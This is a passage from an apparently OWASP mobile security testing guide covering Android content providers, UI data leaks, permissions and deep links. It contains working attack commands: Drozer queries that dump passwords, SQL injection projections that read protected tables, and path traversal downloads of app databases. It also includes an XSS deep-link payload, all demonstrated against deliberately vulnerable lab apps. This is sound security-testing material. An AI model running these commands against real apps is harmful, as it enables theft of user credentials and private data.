to detect content providers exposed by the app. You can identify content providers by the <provider>
element. Complete the following steps:
android:exported
) is \"true\"
. Even if it is not, the tag will be set to \"true\"
automatically if an <intent-filter>
has been defined for the tag. If the content is meant to be accessed only by the app itself, set android:exported
to \"false\"
. If not, set the flag to \"true\"
and define proper read/write permissions.android:permission
). Permission tags limit exposure to other apps.android:protectionLevel
attribute has the value signature
. This setting indicates that the data is intended to be accessed only by apps from the same enterprise (i.e., signed with the same key). To make the data accessible to other apps, apply a security policy with the <permission>
element and set a proper android:protectionLevel
. If you use android:permission
, other applications must declare corresponding <uses-permission>
elements in their manifests to interact with your content provider. You can use the android:grantUriPermissions
attribute to grant more specific access to other apps; you can limit access with the <grant-uri-permission>
element.Inspect the source code to understand how the content provider is meant to be used. Search for the following keywords:
android.content.ContentProvider
android.database.Cursor
android.database.sqlite
.query
.update
.delete
To avoid SQL injection attacks within the app, use parameterized query methods, such as query
, update
, and delete
. Be sure to properly sanitize all method arguments; for example, the selection
argument could lead to SQL injection if it is made up of concatenated user input.
If you expose a content provider, determine whether parameterized query methods (query
, update
, and delete
) are being used to prevent SQL injection. If so, make sure all their arguments are properly sanitized.
We will use the vulnerable password manager app Sieve as an example of a vulnerable content provider.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0007/#inspect-the-android-manifest","title":"Inspect the Android Manifest","text":"Identify all defined <provider>
elements:
<provider\n android:authorities=\"com.mwr.example.sieve.DBContentProvider\"\n android:exported=\"true\"\n android:multiprocess=\"true\"\n android:name=\".DBContentProvider\">\n <path-permission\n android:path=\"/Keys\"\n android:readPermission=\"com.mwr.example.sieve.READ_KEYS\"\n android:writePermission=\"com.mwr.example.sieve.WRITE_KEYS\"\n />\n</provider>\n<provider\n android:authorities=\"com.mwr.example.sieve.FileBackupProvider\"\n android:exported=\"true\"\n android:multiprocess=\"true\"\n android:name=\".FileBackupProvider\"\n/>\n
As shown in the AndroidManifest.xml
above, the application exports two content providers. Note that one path (\"/Keys\") is protected by read and write permissions.
Inspect the query
function in the DBContentProvider.java
file to determine whether any sensitive information is being leaked:
Example in Java:
public Cursor query(final Uri uri, final String[] array, final String s, final String[] array2, final String s2) {\n final int match = this.sUriMatcher.match(uri);\n final SQLiteQueryBuilder sqLiteQueryBuilder = new SQLiteQueryBuilder();\n if (match >= 100 && match < 200) {\n sqLiteQueryBuilder.setTables(\"Passwords\");\n }\n else if (match >= 200) {\n sqLiteQueryBuilder.setTables(\"Key\");\n }\n return sqLiteQueryBuilder.query(this.pwdb.getReadableDatabase(), array, s, array2, (String)null, (String)null, s2);\n}\n
Example in Kotlin:
fun query(uri: Uri?, array: Array<String?>?, s: String?, array2: Array<String?>?, s2: String?): Cursor {\n val match: Int = this.sUriMatcher.match(uri)\n val sqLiteQueryBuilder = SQLiteQueryBuilder()\n if (match >= 100 && match < 200) {\n sqLiteQueryBuilder.tables = \"Passwords\"\n } else if (match >= 200) {\n sqLiteQueryBuilder.tables = \"Key\"\n }\n return sqLiteQueryBuilder.query(this.pwdb.getReadableDatabase(), array, s, array2, null as String?, null as String?, s2)\n }\n
Here we see that there are actually two paths, \"/Keys\" and \"/Passwords\", and the latter is not being protected in the manifest and is therefore vulnerable.
When accessing a URI, the query statement returns all passwords and the path Passwords/
. We will address this in the \"Dynamic Analysis\" section and show the exact URI that is required.
To dynamically analyze an application's content providers, first enumerate the attack surface: pass the app's package name to the Drozer module app.provider.info
:
dz> run app.provider.info -a com.mwr.example.sieve\n Package: com.mwr.example.sieve\n Authority: com.mwr.example.sieve.DBContentProvider\n Read Permission: null\n Write Permission: null\n Content Provider: com.mwr.example.sieve.DBContentProvider\n Multiprocess Allowed: True\n Grant Uri Permissions: False\n Path Permissions:\n Path: /Keys\n Type: PATTERN_LITERAL\n Read Permission: com.mwr.example.sieve.READ_KEYS\n Write Permission: com.mwr.example.sieve.WRITE_KEYS\n Authority: com.mwr.example.sieve.FileBackupProvider\n Read Permission: null\n Write Permission: null\n Content Provider: com.mwr.example.sieve.FileBackupProvider\n Multiprocess Allowed: True\n Grant Uri Permissions: False\n
In this example, two content providers are exported. Both can be accessed without permission, except for the /Keys
path in the DBContentProvider
. With this information, you can reconstruct part of the content URIs to access the DBContentProvider
(the URIs begin with content://
).
To identify content provider URIs within the application, use Drozer's scanner.provider.finduris
module. This module guesses paths and determines accessible content URIs in several ways:
dz> run scanner.provider.finduris -a com.mwr.example.sieve\nScanning com.mwr.example.sieve...\nUnable to Query content://com.mwr.example.sieve.DBContentProvider/\n...\nUnable to Query content://com.mwr.example.sieve.DBContentProvider/Keys\nAccessible content URIs:\ncontent://com.mwr.example.sieve.DBContentProvider/Keys/\ncontent://com.mwr.example.sieve.DBContentProvider/Passwords\ncontent://com.mwr.example.sieve.DBContentProvider/Passwords/\n
Once you have a list of accessible content providers, try to extract data from each provider with the app.provider.query
module:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical\n_id: 1\nservice: Email\nusername: incognitoguy50\npassword: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== (Base64 - encoded)\nemail: incognitoguy50@gmail.com\n
You can also use Drozer to insert, update, and delete records from a vulnerable content provider:
dz> run app.provider.insert content://com.vulnerable.im/messages\n --string date 1331763850325\n --string type 0\n --integer _id 7\n
dz> run app.provider.update content://settings/secure\n --selection \"name=?\"\n --selection-args assisted_gps_enabled\n --integer value 0\n
dz> run app.provider.delete content://settings/secure\n --selection \"name=?\"\n --selection-args my_setting\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0007/#sql-injection-in-content-providers","title":"SQL Injection in Content Providers","text":"The Android platform promotes SQLite databases for storing user data. Because these databases are based on SQL, they may be vulnerable to SQL injection. You can use the Drozer module app.provider.query
to test for SQL injection by manipulating the projection and selection fields that are passed to the content provider:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection \"'\"\nunrecognized token: \"' FROM Passwords\" (code 1): , while compiling: SELECT ' FROM Passwords\n\ndz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection \"'\"\nunrecognized token: \"')\" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')\n
If an application is vulnerable to SQL Injection, it will return a verbose error message. SQL Injection on Android may be used to modify or query data from the vulnerable content provider. In the following example, the Drozer module app.provider.query
is used to list all the database tables:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection \"*\nFROM SQLITE_MASTER WHERE type='table';--\"\n| type | name | tbl_name | rootpage | sql |\n| table | android_metadata | android_metadata | 3 | CREATE TABLE ... |\n| table | Passwords | Passwords | 4 | CREATE TABLE ... |\n| table | Key | Key | 5 | CREATE TABLE ... |\n
SQL Injection may also be used to retrieve data from otherwise protected tables:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection \"* FROM Key;--\"\n| Password | pin |\n| thisismypassword | 9876 |\n
You can automate these steps with the scanner.provider.injection
module, which automatically finds vulnerable content providers within an app:
dz> run scanner.provider.injection -a com.mwr.example.sieve\nScanning com.mwr.example.sieve...\nInjection in Projection:\n content://com.mwr.example.sieve.DBContentProvider/Keys/\n content://com.mwr.example.sieve.DBContentProvider/Passwords\n content://com.mwr.example.sieve.DBContentProvider/Passwords/\nInjection in Selection:\n content://com.mwr.example.sieve.DBContentProvider/Keys/\n content://com.mwr.example.sieve.DBContentProvider/Passwords\n content://com.mwr.example.sieve.DBContentProvider/Passwords/\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0007/#file-system-based-content-providers","title":"File System Based Content Providers","text":"Content providers can provide access to the underlying filesystem. This allows apps to share files (the Android sandbox normally prevents this). You can use the Drozer modules app.provider.read
and app.provider.download
to read and download files, respectively, from exported file-based content providers. These content providers are susceptible to directory traversal, which allows otherwise protected files in the target application's sandbox to be read.
dz> run app.provider.download content://com.vulnerable.app.FileProvider/../../../../../../../../data/data/com.vulnerable.app/database.db /home/user/database.db\nWritten 24488 bytes\n
Use the scanner.provider.traversal
module to automate the process of finding content providers that are susceptible to directory traversal:
dz> run scanner.provider.traversal -a com.mwr.example.sieve\nScanning com.mwr.example.sieve...\nVulnerable Providers:\n content://com.mwr.example.sieve.FileBackupProvider/\n content://com.mwr.example.sieve.FileBackupProvider\n
Note that adb
can also be used to query content providers:
$ adb shell content query --uri content://com.owaspomtg.vulnapp.provider.CredentialProvider/credentials\nRow: 0 id=1, username=admin, password=StrongPwd\nRow: 1 id=2, username=test, password=test\n...\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/","title":"Checking for Sensitive Data Disclosure Through the User Interface","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#static-analysis","title":"Static Analysis","text":"Carefully review all UI components that either show such information or take it as input. Search for any traces of sensitive information and evaluate if it should be masked or completely removed.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#text-fields","title":"Text Fields","text":"To make sure an application is masking sensitive user input, check for the following attribute in the definition of EditText
:
android:inputType=\"textPassword\"\n
With this setting, dots (instead of the input characters) will be displayed in the text field, preventing the app from leaking passwords or pins to the user interface.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#app-notifications","title":"App Notifications","text":"When statically assessing an application, it is recommended to search for any usage of the NotificationManager
class which might be an indication of some form of notification management. If the class is being used, the next step would be to understand how the application is generating the notifications.
These code locations can be fed into the Dynamic Analysis section below, providing an idea of where in the application notifications may be dynamically generated.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#dynamic-analysis","title":"Dynamic Analysis","text":"To determine whether the application leaks any sensitive information to the user interface, run the application and identify components that could be disclosing information.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#text-fields_1","title":"Text Fields","text":"If the information is masked by, for example, replacing input with asterisks or dots, the app isn't leaking data to the user interface.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#app-notifications_1","title":"App Notifications","text":"To identify the usage of notifications run through the entire application and all its available functions looking for ways to trigger any notifications. Consider that you may need to perform actions outside of the application in order to trigger certain notifications.
While running the application you may want to start tracing all calls to functions related to the notifications creation, e.g. setContentTitle
or setContentText
from NotificationCompat.Builder
. Observe the trace in the end and evaluate if it contains any sensitive information.
A screenshot of the current activity is taken when an Android app goes into background and displayed for aesthetic purposes when the app returns to the foreground. However, this may leak sensitive information.
To determine whether the application may expose sensitive information via the app switcher, find out whether the FLAG_SECURE
option has been set. You should find something similar to the following code snippet:
Example in Java:
getWindow().setFlags(WindowManager.LayoutParams.FLAG_SECURE,\n WindowManager.LayoutParams.FLAG_SECURE);\n\nsetContentView(R.layout.activity_main);\n
Example in Kotlin:
window.setFlags(WindowManager.LayoutParams.FLAG_SECURE,\n WindowManager.LayoutParams.FLAG_SECURE)\n\nsetContentView(R.layout.activity_main)\n
If the option has not been set, the application is vulnerable to screen capturing.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0010/#dynamic-analysis","title":"Dynamic Analysis","text":"While black-box testing the app, navigate to any screen that contains sensitive information and click the home button to send the app to the background, then press the app switcher button to see the snapshot. As shown below, if FLAG_SECURE
is set (left image), the snapshot will be empty; if the flag has not been set (right image), activity information will be shown:
On devices supporting file-based encryption (FBE), snapshots are stored in the /data/system_ce/<USER_ID>/<IMAGE_FOLDER_NAME>
folder. <IMAGE_FOLDER_NAME>
depends on the vendor but most common names are snapshots
and recent_images
. If the device doesn't support FBE, the /data/system/<IMAGE_FOLDER_NAME>
folder is used.
Accessing these folders and the snapshots requires root.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/","title":"Testing for App Permissions","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#overview","title":"Overview","text":"When testing app permissions the goal is to try and reduce the amount of permissions used by your app to the absolute minimum. While going through each permission, remember that it is best practice first to try and evaluate whether your app needs to use this permission because many functionalities such as taking a photo can be done without, limiting the amount of access to sensitive data. If permissions are required you will then make sure that the request/response to access the permission is handled handled correctly.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#android-permissions","title":"Android Permissions","text":"Check permissions to make sure that the app really needs them and remove unnecessary permissions. For example, the INTERNET
permission in the AndroidManifest.xml file is necessary for an Activity to load a web page into a WebView. Because a user can revoke an application's right to use a dangerous permission, the developer should check whether the application has the appropriate permission each time an action is performed that would require that permission.
<uses-permission android:name=\"android.permission.INTERNET\" />\n
Go through the permissions with the developer to identify the purpose of every permission set and remove unnecessary permissions.
Besides going through the AndroidManifest.xml file manually, you can also use the Android Asset Packaging tool (aapt) to examine the permissions of an APK file.
aapt comes with the Android SDK within the build-tools folder. It requires an APK file as input. You may list the APKs in the device by running adb shell pm list packages -f | grep -i <keyword>
as seen in \"Listing Installed Apps\".
$ aapt d permissions app-x86-debug.apk\npackage: sg.vp.owasp_mobile.omtg_android\nuses-permission: name='android.permission.WRITE_EXTERNAL_STORAGE'\nuses-permission: name='android.permission.INTERNET'\n
Alternatively you may obtain a more detailed list of permissions via adb and the dumpsys tool:
$ adb shell dumpsys package sg.vp.owasp_mobile.omtg_android | grep permission\n requested permissions:\n android.permission.WRITE_EXTERNAL_STORAGE\n android.permission.INTERNET\n android.permission.READ_EXTERNAL_STORAGE\n install permissions:\n android.permission.INTERNET: granted=true\n runtime permissions:\n
Please reference this permissions overview for descriptions of the listed permissions that are considered dangerous.
READ_CALENDAR\nWRITE_CALENDAR\nREAD_CALL_LOG\nWRITE_CALL_LOG\nPROCESS_OUTGOING_CALLS\nCAMERA\nREAD_CONTACTS\nWRITE_CONTACTS\nGET_ACCOUNTS\nACCESS_FINE_LOCATION\nACCESS_COARSE_LOCATION\nRECORD_AUDIO\nREAD_PHONE_STATE\nREAD_PHONE_NUMBERS\nCALL_PHONE\nANSWER_PHONE_CALLS\nADD_VOICEMAIL\nUSE_SIP\nBODY_SENSORS\nSEND_SMS\nRECEIVE_SMS\nREAD_SMS\nRECEIVE_WAP_PUSH\nRECEIVE_MMS\nREAD_EXTERNAL_STORAGE\nWRITE_EXTERNAL_STORAGE\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#custom-permissions","title":"Custom Permissions","text":"Apart from enforcing custom permissions via the application manifest file, you can also check permissions programmatically. This is not recommended, however, because it is more error-prone and can be bypassed more easily with, e.g., runtime instrumentation. It is recommended that the ContextCompat.checkSelfPermission
method is called to check if an activity has a specified permission. Whenever you see code like the following snippet, make sure that the same permissions are enforced in the manifest file.
private static final String TAG = \"LOG\";\nint canProcess = checkCallingOrSelfPermission(\"com.example.perm.READ_INCOMING_MSG\");\nif (canProcess != PERMISSION_GRANTED)\nthrow new SecurityException();\n
Or with ContextCompat.checkSelfPermission
which compares it to the manifest file.
if (ContextCompat.checkSelfPermission(secureActivity.this, Manifest.READ_INCOMING_MSG)\n != PackageManager.PERMISSION_GRANTED) {\n //!= stands for not equals PERMISSION_GRANTED\n Log.v(TAG, \"Permission denied\");\n }\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#requesting-permissions","title":"Requesting Permissions","text":"If your application has permissions that need to be requested at runtime, the application must call the requestPermissions
method in order to obtain them. The app passes the permissions needed and an integer request code you have specified to the user asynchronously, returning once the user chooses to accept or deny the request in the same thread. After the response is returned the same request code is passed to the app's callback method.
private static final String TAG = \"LOG\";\n// We start by checking the permission of the current Activity\nif (ContextCompat.checkSelfPermission(secureActivity.this,\n Manifest.permission.WRITE_EXTERNAL_STORAGE)\n != PackageManager.PERMISSION_GRANTED) {\n\n // Permission is not granted\n // Should we show an explanation?\n if (ActivityCompat.shouldShowRequestPermissionRationale(secureActivity.this,\n //Gets whether you should show UI with rationale for requesting permission.\n //You should do this only if you do not have permission and the permission requested rationale is not communicated clearly to the user.\n Manifest.permission.WRITE_EXTERNAL_STORAGE)) {\n // Asynchronous thread waits for the users response.\n // After the user sees the explanation try requesting the permission again.\n } else {\n // Request a permission that doesn't need to be explained.\n ActivityCompat.requestPermissions(secureActivity.this,\n new String[]{Manifest.permission.WRITE_EXTERNAL_STORAGE},\n MY_PERMISSIONS_REQUEST_WRITE_EXTERNAL_STORAGE);\n // MY_PERMISSIONS_REQUEST_WRITE_EXTERNAL_STORAGE will be the app-defined int constant.\n // The callback method gets the result of the request.\n }\n} else {\n // Permission already granted debug message printed in terminal.\n Log.v(TAG, \"Permission already granted.\");\n}\n
Please note that if you need to provide any information or explanation to the user it needs to be done before the call to requestPermissions
, since the system dialog box can not be altered once called.
Now your app has to override the system method onRequestPermissionsResult
to see if the permission was granted. This method receives the requestCode
integer as input parameter (which is the same request code that was created in requestPermissions
).
The following callback method may be used for WRITE_EXTERNAL_STORAGE
.
@Override //Needed to override system method onRequestPermissionsResult()\npublic void onRequestPermissionsResult(int requestCode, //requestCode is what you specified in requestPermissions()\n String permissions[], int[] permissionResults) {\n switch (requestCode) {\n case MY_PERMISSIONS_WRITE_EXTERNAL_STORAGE: {\n if (grantResults.length > 0\n && permissionResults[0] == PackageManager.PERMISSION_GRANTED) {\n // 0 is a canceled request, if int array equals requestCode permission is granted.\n } else {\n // permission denied code goes here.\n Log.v(TAG, \"Permission denied\");\n }\n return;\n }\n // Other switch cases can be added here for multiple permission checks.\n }\n}\n
Permissions should be explicitly requested for every needed permission, even if a similar permission from the same group has already been requested. For applications targeting Android 7.1 (API level 25) and older, Android will automatically give an application all the permissions from a permission group, if the user grants one of the requested permissions of that group. Starting with Android 8.0 (API level 26), permissions will still automatically be granted if a user has already granted a permission from the same permission group, but the application still needs to explicitly request the permission. In this case, the onRequestPermissionsResult
handler will automatically be triggered without any user interaction.
For example if both READ_EXTERNAL_STORAGE
and WRITE_EXTERNAL_STORAGE
are listed in the Android Manifest but only permissions are granted for READ_EXTERNAL_STORAGE
, then requesting WRITE_EXTERNAL_STORAGE
will automatically have permissions without user interaction because they are in the same group and not explicitly requested.
Always check whether the application is requesting permissions it actually requires. Make sure that no permissions are requested which are not related to the goal of the app, especially DANGEROUS
and SIGNATURE
permissions, since they can affect both the user and the application if mishandled. For instance, it should be suspicious if a single-player game app requires access to android.permission.WRITE_SMS
.
When analyzing permissions, you should investigate the concrete use case scenarios of the app and always check if there are replacement APIs for any DANGEROUS
permissions in use. A good example is the SMS Retriever API which streamlines the usage of SMS permissions when performing SMS-based user verification. By using this API an application does not have to declare DANGEROUS
permissions which is a benefit to both the user and developers of the application, who doesn't have to submit the Permissions Declaration Form.
Permissions for installed applications can be retrieved with adb
. The following extract demonstrates how to examine the permissions used by an application.
$ adb shell dumpsys package com.google.android.youtube\n...\ndeclared permissions:\n com.google.android.youtube.permission.C2D_MESSAGE: prot=signature, INSTALLED\nrequested permissions:\n android.permission.INTERNET\n android.permission.ACCESS_NETWORK_STATE\ninstall permissions:\n com.google.android.c2dm.permission.RECEIVE: granted=true\n android.permission.USE_CREDENTIALS: granted=true\n com.google.android.providers.gsf.permission.READ_GSERVICES: granted=true\n...\n
The output shows all permissions using the following categories:
When doing the dynamic analysis:
android.permission.WRITE_SMS
, might not be a good idea.ACCESS_COARSE_LOCATION
permission instead of ACCESS_FINE_LOCATION
. Or even better not requesting the permission at all, and instead ask the user to enter a postal code.ACTION_IMAGE_CAPTURE
or ACTION_VIDEO_CAPTURE
intent action instead of requesting the CAMERA
permission.ACCESS_FINE_LOCATION
, ACCESS_COARSE_LOCATIION
, or BLUETOOTH_ADMIN
permissions.To obtain detail about a specific permission you can refer to the Android Documentation.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/","title":"Testing Deep Links","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/#overview","title":"Overview","text":"Any existing deep links (including App Links) can potentially increase the app attack surface. This includes many risks such as link hijacking, sensitive functionality exposure, etc.
All deep links must be enumerated and verified for correct website association. The actions they perform must be well tested, especially all input data, which should be deemed untrustworthy and thus should always be validated.
None of the input from these sources can be trusted; it must be validated and/or sanitized. Validation ensures processing of data that the app is expecting only. If validation is not enforced, any input can be sent to the app, which may allow an attacker or malicious app to exploit app functionality.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/#check-for-android-os-version","title":"Check for Android OS Version","text":"The Android version in which the app runs also influences the risk of using deep links. Inspect the Android Manifest to check if minSdkVersion
is 31 or higher.
Inspecting the Android Manifest:
You can easily determine whether deep links (with or without custom URL schemes) are defined by decoding the app using apktool and inspecting the Android Manifest file looking for <intent-filter>
elements.
myapp://
.<activity android:name=\".MyUriActivity\">\n <intent-filter>\n <action android:name=\"android.intent.action.VIEW\" />\n <category android:name=\"android.intent.category.DEFAULT\" />\n <category android:name=\"android.intent.category.BROWSABLE\" />\n <data android:scheme=\"myapp\" android:host=\"path\" />\n </intent-filter>\n</activity>\n
http://
and https://
schemes, along with the host and path that will activate it (in this case, the full URL would be https://www.myapp.com/my/app/path
):<intent-filter>\n ...\n <data android:scheme=\"http\" android:host=\"www.myapp.com\" android:path=\"/my/app/path\" />\n <data android:scheme=\"https\" android:host=\"www.myapp.com\" android:path=\"/my/app/path\" />\n</intent-filter>\n
<intent-filter>
includes the flag android:autoVerify=\"true\"
, this causes the Android system to reach out to the declared android:host
in an attempt to access the Digital Asset Links file in order to verify the App Links. A deep link can be considered an App Link only if the verification is successful.<intent-filter android:autoVerify=\"true\">\n
When listing deep links remember that <data>
elements within the same <intent-filter>
are actually merged together to account for all variations of their combined attributes.
<intent-filter>\n ...\n <data android:scheme=\"https\" android:host=\"www.example.com\" />\n <data android:scheme=\"app\" android:host=\"open.my.app\" />\n</intent-filter>\n
It might seem as though this supports only https://www.example.com
and app://open.my.app
. However, it actually supports:
https://www.example.com
app://open.my.app
app://www.example.com
https://open.my.app
Using Dumpsys:
Use adb to run the following command that will show all schemes:
adb shell dumpsys package com.example.package\n
Using Android \"App Link Verification\" Tester:
Use the Android \"App Link Verification\" Tester script to list all deep links (list-all
) or only app links (list-applinks
):
python3 deeplink_analyser.py -op list-all -apk ~/Downloads/example.apk\n\n.MainActivity\n\napp://open.my.app\napp://www.example.com\nhttps://open.my.app\nhttps://www.example.com\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/#check-for-correct-website-association","title":"Check for Correct Website Association","text":"Even if deep links contain the android:autoVerify=\"true\"
attribute, they must be actually verified in order to be considered App Links. You should test for any possible misconfigurations that might prevent full verification.
Use the Android \"App Link Verification\" Tester script to get the verification status for all app links (verify-applinks
). See an example here.
Only on Android 12 (API level 31) or higher:
You can use adb to test the verification logic regardless of whether the app targets Android 12 (API level 31) or not. This feature allows you to:
You can also review the verification results. For example:
adb shell pm get-app-links com.example.package\n\ncom.example.package:\n ID: 01234567-89ab-cdef-0123-456789abcdef\n Signatures: [***]\n Domain verification state:\n example.com: verified\n sub.example.com: legacy_failure\n example.net: verified\n example.org: 1026\n
The same information can be found by running adb shell dumpsys package com.example.package
(only on Android 12 (API level 31) or higher).
This section details a few, of potentially many, reasons why the verification process failed or was not actually triggered. See more information in the Android Developers Documentation and in the white paper \"Measuring the Insecurity of Mobile Deep Links of Android\".
Check the Digital Asset Links file:
/.well-known/
path. Example: https://www.example.com/.well-known/assetlinks.json
https://digitalassetlinks.googleapis.com/v1/statements:list?source.web.site=www.example.com
Check for Redirects:
To enhance the app security, the system doesn't verify any Android App Links for an app if the server sets a redirect such as http://example.com
to https://example.com
or example.com
to www.example.com
.
Check for Subdomains:
If an intent filter lists multiple hosts with different subdomains, there must be a valid Digital Asset Links file on each domain. For example, the following intent filter includes www.example.com
and mobile.example.com
as accepted intent URL hosts.
<application>\n <activity android:name=\u201dMainActivity\u201d>\n <intent-filter android:autoVerify=\"true\">\n <action android:name=\"android.intent.action.VIEW\" />\n <category android:name=\"android.intent.category.DEFAULT\" />\n <category android:name=\"android.intent.category.BROWSABLE\" />\n <data android:scheme=\"https\" />\n <data android:scheme=\"https\" />\n <data android:host=\"www.example.com\" />\n <data android:host=\"mobile.example.com\" />\n </intent-filter>\n </activity>\n</application>\n
In order for the deep links to correctly register, a valid Digital Asset Links file must be published at both https://www.example.com/.well-known/assetlinks.json
and https://mobile.example.com/.well-known/assetlinks.json
.
Check for Wildcards:
If the hostname includes a wildcard (such as *.example.com
), you should be able to find a valid Digital Asset Links file at the root hostname: https://example.com/.well-known/assetlinks.json
.
Even if the deep link is correctly verified, the logic of the handler method should be carefully analyzed. Pay special attention to deep links being used to transmit data (which is controlled externally by the user or any other app).
First, obtain the name of the Activity from the Android Manifest <activity>
element which defines the target <intent-filter>
and search for usage of getIntent
and getData
. This general approach of locating these methods can be used across most applications when performing reverse engineering and is key when trying to understand how the application uses deep links and handles any externally provided input data and if it could be subject to any kind of abuse.
The following example is a snippet from an exemplary Kotlin app decompiled with jadx. From the static analysis we know that it supports the deep link deeplinkdemo://load.html/
as part of com.mstg.deeplinkdemo.WebViewActivity
.
// snippet edited for simplicity\npublic final class WebViewActivity extends AppCompatActivity {\n private ActivityWebViewBinding binding;\n\n public void onCreate(Bundle savedInstanceState) {\n Uri data = getIntent().getData();\n String html = data == null ? null : data.getQueryParameter(\"html\");\n Uri data2 = getIntent().getData();\n String deeplink_url = data2 == null ? null : data2.getQueryParameter(\"url\");\n View findViewById = findViewById(R.id.webView);\n if (findViewById != null) {\n WebView wv = (WebView) findViewById;\n wv.getSettings().setJavaScriptEnabled(true);\n if (deeplink_url != null) {\n wv.loadUrl(deeplink_url);\n ...\n
You can simply follow the deeplink_url
String variable and see the result from the wv.loadUrl
call. This means the attacker has full control of the URL being loaded to the WebView (as shown above has JavaScript enabled.
The same WebView might be also rendering an attacker controlled parameter. In that case, the following deep link payload would trigger Reflected Cross-Site Scripting (XSS) within the context of the WebView:
deeplinkdemo://load.html?attacker_controlled=<svg onload=alert(1)>\n
But there are many other possibilities. Be sure to check the following sections to learn more about what to expect and how to test different scenarios:
In addition, we recommend to search and read public reports (search term: \"deep link*\"|\"deeplink*\" site:https://hackerone.com/reports/
). For example:
Here you will use the list of deep links from the static analysis to iterate and determine each handler method and the processed data, if any. You will first start a Frida hook and then begin invoking the deep links.
The following example assumes a target app that accepts this deep link: deeplinkdemo://load.html
. However, we don't know the corresponding handler method yet, nor the parameters it potentially accepts.
[Step 1] Frida Hooking:
You can use the script \"Android Deep Link Observer\" from Frida CodeShare to monitor all invoked deep links triggering a call to Intent.getData
. You can also use the script as a base to include your own modifications depending on the use case at hand. In this case we included the stack trace in the script since we are interested in the method which calls Intent.getData
.
[Step 2] Invoking Deep Links:
Now you can invoke any of the deep links using adb and the Activity Manager (am) which will send intents within the Android device. For example:
adb shell am start -W -a android.intent.action.VIEW -d \"deeplinkdemo://load.html/?message=ok#part1\"\n\nStarting: Intent { act=android.intent.action.VIEW dat=deeplinkdemo://load.html/?message=ok }\nStatus: ok\nLaunchState: WARM\nActivity: com.mstg.deeplinkdemo/.WebViewActivity\nTotalTime: 210\nWaitTime: 217\nComplete\n
This might trigger the disambiguation dialog when using the \"http/https\" schema or if other installed apps support the same custom URL schema. You can include the package name to make it an explicit intent.
This invocation will log the following:
[*] Intent.getData() was called\n[*] Activity: com.mstg.deeplinkdemo.WebViewActivity\n[*] Action: android.intent.action.VIEW\n\n[*] Data\n- Scheme: deeplinkdemo://\n- Host: /load.html\n- Params: message=ok\n- Fragment: part1\n\n[*] Stacktrace:\n\nandroid.content.Intent.getData(Intent.java)\ncom.mstg.deeplinkdemo.WebViewActivity.onCreate(WebViewActivity.kt)\nandroid.app.Activity.performCreate(Activity.java)\n...\ncom.android.internal.os.ZygoteInit.main(ZygoteInit.java)\n
In this case we've crafted the deep link including arbitrary parameters (?message=ok
) and fragment (#part1
). We still don't know if they are being used. The information above reveals useful information that you can use now to reverse engineer the app. See the section \"Check the Handler Method\" to learn about things you should consider.
WebViewActivity.kt
com.mstg.deeplinkdemo.WebViewActivity
onCreate
Sometimes you can even take advantage of other applications that you know interact with your target app. You can reverse engineer the app, (e.g. to extract all strings and filter those which include the target deep links, deeplinkdemo:///load.html
in the previous case), or use them as triggers, while hooking the app as previously discussed.
To test for sensitive functionality exposure through IPC mechanisms you should first enumerate all the IPC mechanisms the app uses and then try to identify whether sensitive data is leaked when the mechanisms are used.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#static-analysis","title":"Static Analysis","text":"We start by looking at the AndroidManifest.xml, where all activities, services, and content providers included in the app must be declared (otherwise the system won't recognize them and they won't run).
<intent-filter>
<service>
<provider>
<receiver>
An \"exported\" activity, service, or content can be accessed by other apps. There are two common ways to designate a component as exported. The obvious one is setting the export tag to true android:exported=\"true\"
. The second way involves defining an <intent-filter>
within the component element (<activity>
, <service>
, <receiver>
). When this is done, the export tag is automatically set to \"true\". To prevent all other Android apps from interacting with the IPC component element, be sure that the android:exported=\"true\"
value and an <intent-filter>
aren't in their AndroidManifest.xml
files unless this is necessary.
Remember that using the permission tag (android:permission
) will also limit other applications' access to a component. If your IPC is intended to be accessible to other applications, you can apply a security policy with the <permission>
element and set a proper android:protectionLevel
. When android:permission
is used in a service declaration, other applications must declare a corresponding <uses-permission>
element in their own manifest to start, stop, or bind to the service.
